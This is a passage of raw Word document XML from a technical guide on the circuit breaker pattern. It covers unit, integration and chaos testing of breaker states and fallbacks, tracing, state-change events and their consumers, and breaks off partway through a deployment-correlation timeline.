          <w:ilvl w:val="1"/>
          <w:numId w:val="1083"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Wait for timeout. Verify state → HALF-OPEN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB14804" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1083"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Inject success in half-open. Verify state → CLOSED.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5224A21C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1083"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Inject failure in half-open. Verify state → OPEN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626BF226" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Threshold behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62357DCF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1083"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Inject failures just below threshold. Verify stays CLOSED.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39285E84" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1083"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Inject one more failure (crosses threshold). Verify → OPEN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBED281" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1083"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Verify minimum throughput requirement (don't trip on low volume).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9E95ED" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sliding window correctness:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EA70A1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1083"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Fill window with failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EF8790" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1083"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Advance time so old failures slide out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35306632" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1083"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Verify failure rate drops (and circuit closes if in half-open).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCD5F90" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fallback execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD7D129" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1083"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit OPEN → verify fallback is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7FCE10" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1083"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Fallback itself throws → verify behavior (should not mask the issue).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6111102E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.2 Integration Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A6A2C7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Simulate downstream failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BFA5FB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1084"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Use a mock server that responds with errors (WireMock, MockServer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504F410F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1084"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Configure mock to return 500 for 60% of requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7FC31B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1084"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Verify the circuit trips at the expected time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6C9071" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1084"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Then configure mock to return 200.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EE0A47" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1084"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Verify the circuit closes after recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410D2DB8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Test with realistic timing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319FC336" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1085"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Inject slow responses (not just errors).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5910C083" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1085"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Verify slow-call detection works.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B64FE2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1085"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Test with concurrent requests (thread safety).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57237953" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.3 Chaos Testing in Production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F25879" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Inject failures at the network level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A38BBFA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1086"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Use toxiproxy or Chaos Monkey to introduce latency/errors to a specific downstream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D902B22" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1086"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Verify:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED36B80" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1086"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit breaker trips within expected timeframe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCFF786" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1086"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Fallback is served to users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2857AA6B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1086"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>No cascade to other services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4631A370" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1086"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit recovers when failure is removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7957CDFC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1086"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Metrics/alerts fire as expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388635A2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Test the fallback path regularly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC44FB6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The fallback code path is exercised rarely (only when things go wrong). This means:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7932B402" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1087"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>It might have bugs that are never discovered until a real outage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2930A817" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1087"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Dependencies of the fallback might not exist anymore (deprecated cache, removed endpoint).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAD3B78" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1087"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Run periodic "fallback drills" — force the circuit open and verify fallbacks work end-to-end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CF3E83" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="352E5CE6">
          <v:rect id="_x0000_i4258" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="139E1237" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17. Circuit Breaker and Observability Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322D8DBD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.1 Distributed Tracing with Circuit Breakers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A3699F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How the circuit breaker appears in a trace:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5017CA0F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAF7E5C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Span: GET /checkout (200, 150ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568F7240" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  └── Span: Call PaymentService (CIRCUIT_BREAKER_OPEN, 1ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581EF17E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">        └── Tags: cb.state=OPEN, cb.name=payment-service, fallback=cached_approval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36234C5C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The trace shows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03353A3F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1088"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The call was never made to the downstream (CIRCUIT_BREAKER_OPEN).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0827AE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1088"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Total time: 1ms (fail-fast).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE6F8CE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1088"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>The fallback that was used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE3E953" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1088"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Which circuit breaker instance was responsible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447B03F9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This helps debugging:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> When a user reports an issue, the trace immediately shows: "This failed because the payment circuit breaker was open at that time, and the cached fallback was used."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5433CF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.2 Circuit Breaker Events in the Event Stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F54698F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Publish circuit breaker state changes as domain events:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2462793A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D17D95" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCBC354" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  "event": "circuit_breaker_state_change",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37112D48" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  "service": "checkout-service",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2902ECBD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  "circuit_breaker": "payment-service",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7040D05F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  "from_state": "CLOSED",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0186B1D2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  "to_state": "OPEN",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27606895" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  "reason": "failure_rate_exceeded",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3898E4D0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  "failure_rate": 0.72,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8EC5E2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  "window_size": "30s",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4A47D0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  "timestamp": "2026-05-28T14:30:05.123Z"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B1F929" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB08ACF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consumers of these events:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CA1D36" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1089"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Incident management system (auto-create an incident).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CF7DAE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1089"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Slack/PagerDuty (notify the team).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2415469E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1089"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Status page (update user-facing status).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F42DD09" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1089"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Auto-scaling system (scale up if the issue is load-related).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2326809B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1089"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Deployment system (auto-rollback if circuit opened right after a deployment).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17208816" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.3 Correlating Circuit Breaker Events with Deployments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56117C4C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The most common cause of circuit breaker trips: bad deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DA544F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE15FB3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>14:25:00 - Deployment of payment-service v2.3.1 begins (canary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A211964" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>14:26:00 - Payment service error rate rises to 15%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D7D01F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>14:27:00 - Error rate at 55%</w:t>
      </w:r>
    </w:p>
